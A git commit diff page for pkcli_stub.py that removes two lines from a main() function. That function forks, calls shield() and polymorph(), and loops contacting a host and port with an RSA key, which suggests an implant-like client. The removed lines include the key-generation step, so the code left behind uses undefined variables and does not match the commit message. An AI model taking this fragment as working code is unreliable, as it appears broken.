diff options
| author | Carson Fleming <cflems@cflems.net> | 2023-12-18 18:13:33 -0500 |
|---|---|---|
| committer | Carson Fleming <cflems@cflems.net> | 2023-12-18 18:13:33 -0500 |
| commit | 844b2fe1e9a34d9f9875f3526cfad06879bbfa27 (patch) | |
| tree | 5378ba40cc4418e0b1760daa90a31356b0d5ec07 /pkcli_stub.py | |
| parent | 5f2a3100c9c4bef50e0f2ddf8e405e2c1bd161d5 (diff) | |
| download | pk-844b2fe1e9a34d9f9875f3526cfad06879bbfa27.tar.gz | |
Delete extra printing and white space
Diffstat (limited to 'pkcli_stub.py')
| -rw-r--r-- | pkcli_stub.py | 2 |
1 files changed, 0 insertions, 2 deletions
diff --git a/pkcli_stub.py b/pkcli_stub.py index c6561f8..2ebae3d 100644 --- a/pkcli_stub.py +++ b/pkcli_stub.py @@ -38,11 +38,9 @@ def main(): print('forking') shield() polymorph() - p,q,n,e,d = Crypto.keygen(bits=bits) privkey = { 'n': n, 'd': d } refresh_hdb() - print('done') while True: if not work(ha, port, privkey, bits=bits): |
